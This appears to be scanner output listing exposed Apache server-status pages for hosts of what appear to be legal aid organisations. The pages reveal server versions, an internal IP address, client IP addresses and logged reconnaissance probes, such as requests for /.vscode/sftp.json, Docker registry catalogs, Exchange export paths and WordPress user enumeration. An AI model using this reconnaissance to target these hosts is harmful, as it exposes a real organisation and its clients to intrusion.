45.79.149.214http/1.1atlantalegalaid.org:8080\x16\x03\x01\x02 15-579-0/0/265251. 5.7940754100.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.0041425400.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7831737600.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0041424800.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2741425900.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4240754300.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8741425700.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0041425100.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.963977062630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0041425000.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0044262900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0044262700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0044262500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00268460800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00268460600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00268460700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00268460500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82913628700.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00920768500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15910580600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0691241056620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23912410500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00920772000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00920771800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32912410510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00920771900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00920771700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00920771600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00920771500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00920771400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00920771300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001380005200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001380005100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001380005000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001380004900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001380004800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001380004700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001380004600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001380004500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001380004400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001380004300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea5cb3b07a
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 12-Nov-2025 21:19:38 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 583 Parent Server MPM Generation: 582 Server uptime: 582 days 4 hours 25 minutes 4 seconds Server load: 0.00 0.00 0.00 Total accesses: 13759917 - Total Traffic: 195.7 GB CPU Usage: u372.35 s32.4 cu0 cs0 - .000805% CPU load .274 requests/sec - 4177 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ____.__W_._.._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5823860/78/812595_ 6.37212650.02.0813469.74 130.176.208.182http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 1-5823940/181/789512_ 24.50312600.04.7713078.34 130.176.208.182http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 2-5823460/59/757969_ 9.114430.02.6412941.36 3.172.13.83http/1.1elearning.alas.org:8080GET / HTTP/1.1 3-5823450/115/740035_ 15.39412670.04.1712409.90 130.176.208.182http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 4-582-0/0/720361. 16.21632100.00.0011887.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-58247670/49/699668_ 2.65342720.00.8911562.63 130.176.208.182http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 6-5823510/38/660518_ 6.21361450.01.5610898.78 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762982335.087194919586181 7-582223425/127/635667W 7.550058.32.2910398.64 3.172.13.83http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-5823640/51/603460_ 8.02211410.02.489807.82 130.176.208.182http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 9-582-0/0/583625. 0.00631700.00.009219.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-58222440/35/514299_ 5.55402560.01.888750.57 130.176.208.182http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 11-582-0/0/478720. 0.00631600.00.007901.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-582-0/0/414990. 0.00631500.00.006594.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-58245850/16/328793_ 3.08302570.00.854789.90 130.176.208.182http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 14-579-0/0/289488. 3.122264762500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.7923631100.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.0024302400.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7814614600.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0024301800.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2724302900.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4223631300.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8724302700.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0024302100.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.962264762630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0024302000.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0027140000.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0027139800.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0027139600.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00251337900.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00251337700.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00251337800.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00251337600.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82896505800.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00903645500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15893457600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0689528766620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23895287600.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00903649100.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00903648800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32895287610080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00903648900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00903648700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00903648600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00903648500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00903648400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00903648300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001362882200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001362882100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001362882000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001362881900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001362881800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001362881700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001362881600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001362881500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001362881400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001362881300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea19bac879
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 05-Jan-2024 21:12:41 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 260 Parent Server MPM Generation: 259 Server uptime: 259 days 5 hours 28 minutes 43 seconds Server load: 0.09 0.04 0.01 Total accesses: 4978817 - Total Traffic: 61.3 GB CPU Usage: u104.7 s16.68 cu0 cs.02 - .000542% CPU load .222 requests/sec - 2939 B/second - 12.9 kB/request 8 requests currently being processed, 5 idle workers ___KK._.K_W..K.KW.K............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-259192290/0/367035_ 0.00100.00.004604.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-259192340/0/361849_ 3.71000.00.004622.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-259192350/0/346642_ 0.00000.00.004532.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-259190276/14/341639K 2.230036.10.204339.10 70.132.4.67http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-259190366/10/332859K 0.830036.60.054161.22 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-259-0/0/320887. 0.3035600.00.004048.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-259188930/16/306252_ 0.81201850.00.133965.78 130.176.137.97http/1.1events.atlantalegalaid.org:8080POST /wp-cron.php?doing_wp_cron=1704489136.04742288589477539062 7-259-0/0/301983. 1.2935300.00.003818.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-259188947/28/279445K 1.601768238.40.433782.88 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 9-259190370/4/273376_ 0.22203950.00.393206.49 52.46.56.149http/1.1events.atlantalegalaid.org:8080POST /wp-login.php HTTP/1.1 10-259190384/8/240431W 0.64004.20.053131.32 70.132.4.67http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 11-259-0/0/206918. 0.0036100.00.002756.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-259-0/0/190055. 0.5935200.00.002383.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-259189592/17/142987K 2.3112542.10.101704.53 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1704489159.77701306343078613281 14-259-0/0/120258. 7.1835500.00.001375.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-259189641/15/118621K 0.61101.10.111400.46 70.132.1.81http/1.1on.alas.org:8080GET / HTTP/1.1 16-259190561/5/106663W 0.67001.00.041268.56 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 17-259-0/0/54694. 0.0036000.00.00663.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-2591906214/19/43387K 0.280022.10.08541.53 70.132.1.81http/1.1on.alas.org:8080GET /about HTTP/1.1 19-259-0/0/41140. 0.0036300.00.00537.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-259-0/0/37673. 0.0035800.00.00468.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-259-0/0/35861. 0.0035900.00.00491.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-259-0/0/36807. 0.0035100.00.00431.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-259-0/0/36359. 0.0035700.00.00439.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-259-0/0/33096. 0.0036200.00.00351.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-259-0/0/14197. 0.001509900.00.00228.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-259-0/0/12734. 0.001699100.00.00208.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-259-0/0/14593. 0.001699000.00.00207.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-259-0/0/14941. 0.001698900.00.00163.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-259-0/0/10979. 0.001698800.00.00157.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-259-0/0/11910. 0.001698600.00.00181.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-259-0/0/16151. 0.001698700.00.00165.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-259-0/0/13571. 0.001698500.00.00157.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-259-0/0/10375. 0.001698400.00.00171.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-259-0/0/13174. 0.001698300.00.00145.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-259-0/0/10948. 0.001698200.00.00128.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-259-0/0/10272. 0.001698100.00.00143.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-259-0/0/12727. 0.001698000.00.00147.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-259-0/0/12419. 0.001697900.00.00129.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-259-0/0/10718. 0.001697800.00.00137.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-259-0/0/10884. 2.421622200.00.00116.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-258-0/0/4597. 0.009655000.00.0045.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-258-0/0/4955. 1.549555400.00.0052.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-258-0/0/4263. 0.009654700.00.0030.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-258-0/0/1951. 0.009655100.00.0029.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-258-0/0/2902. 0.009654800.00.0036.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-258-0/0/2506. 0.009654900.00.0021.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-258-0/0/2471. 0.009654600.00.0043.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-258-0/0/3007. 0.009654400.00.0037.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-258-0/0/3100. 7.829419200.00.0030.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-258-0/0/2996. 0.009654200.00.0036.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-258-0/0/1678. 0.009654300.00.0025.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-258-0/0/2505. 0.009654500.00.0027.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-258-0/0/1931. 0.009653700.00.0023.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-258-0/0/1651. 0.709621200.00.0030.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-258-0/0/3506. 0.689611000.00.0027.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-258-0/0/2282. 3.89957740
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea94489b56
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 24-Dec-2023 05:27:04 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 247 Parent Server MPM Generation: 246 Server uptime: 246 days 13 hours 43 minutes 5 seconds Server load: 0.28 0.12 0.04 Total accesses: 4731030 - Total Traffic: 58.4 GB CPU Usage: u672.54 s53.09 cu0 cs.01 - .00341% CPU load .222 requests/sec - 2942 B/second - 12.9 kB/request 8 requests currently being processed, 3 idle workers KKK_K_...._K.K..K.W............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-246322184/23/347394K 3.060034.10.624380.65 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-246323871/10/341832K 3.31001.00.324374.15 70.132.4.89http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 2-246315461/305/327785K 21.61101.01.994298.26 70.132.1.81http/1.1on.alas.org:8080GET / HTTP/1.1 3-246321750/52/322942_ 6.6304920.00.974114.36 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 4-246323681/14/314572K 2.8512111.00.433946.62 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1703395621.97603607177734375000 5-246324580/0/303382_ 2.34000.00.003843.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-246-0/0/288464. 7.984700.00.003757.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-246-0/0/285868. 2.994500.00.003614.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-246-0/0/262561. 21.554300.00.003595.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-246-0/0/258248. 3.584800.00.003005.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-246322080/23/227275_ 3.6924820.00.332977.85 130.176.29.140http/1.1gwinnettfamilylawclinic.org:808POST /wp-login.php HTTP/1.1 11-246324102/8/194278K 2.930235380.80.642600.17 70.132.1.81http/1.1events.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 12-246-0/0/180098. 3.024900.00.002248.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-246324191/7/138168K 3.252689.20.401642.02 205.251.218.141http/1.1gwinnettfamilylawclinic.org:808GET /wp-login.php HTTP/1.1 14-246-0/0/115913. 0.724100.00.001320.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-246-0/0/113637. 0.834400.00.001342.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-246324223/8/102389K 2.240033.00.211207.97 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 17-246-0/0/53148. 0.555000.00.00644.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-246324442/5/41694W 1.88002.00.14517.13 70.132.4.67http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 19-246-0/0/40053. 0.004600.00.00525.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-246-0/0/36628. 96.271777100.00.00459.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-246-0/0/35296. 0.222276000.00.00486.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-246-0/0/35835. 0.212276100.00.00423.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-246-0/0/35469. 32.542238000.00.00427.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-246-0/0/32506. 110.891560400.00.00338.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-246-0/0/13900. 70.592128000.00.00225.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-246-0/0/12369. 0.242278500.00.00204.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-246-0/0/14344. 0.232278100.00.00202.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-246-0/0/14723. 0.222277900.00.00160.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-246-0/0/10785. 0.232277800.00.00155.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-246-0/0/11706. 0.232278600.00.00178.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-246-0/0/15874. 0.222278000.00.00163.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-246-0/0/13359. 0.222278200.00.00154.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-246-0/0/10229. 0.232277700.00.00170.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-246-0/0/12819. 0.222278400.00.00142.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-246-0/0/10746. 0.002279000.00.00127.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-246-0/0/10104. 0.222278300.00.00141.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-246-0/0/12610. 0.002278900.00.00146.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-246-0/0/12292. 109.111564700.00.00128.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-246-0/0/10604. 0.002278800.00.00136.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-246-0/0/10597. 0.002278700.00.00104.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-246-0/0/4560. 129.601472000.00.0045.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-245-0/0/4864. 0.5414505200.00.0051.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-245-0/0/4197. 0.0014513000.00.0029.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-245-0/0/1873. 0.0014512900.00.0027.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-245-0/0/2862. 0.0014512800.00.0035.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-245-0/0/2074. 0.0014512700.00.0018.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-245-0/0/2433. 0.5114509200.00.0042.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-245-0/0/2979. 0.0014512600.00.0037.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-245-0/0/3035. 0.0014512500.00.0030.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-245-0/0/2943. 0.0014512400.00.0036.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-245-0/0/1610. 0.0014512300.00.0024.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-245-0/0/2411. 0.0014512200.00.0026.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-245-0/0/1860. 0.3714504200.00.0022.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-245-0/0/1586. 0.3814504700.00.0030.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-245-0/0/3342. 0.1614508900.00.0026.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 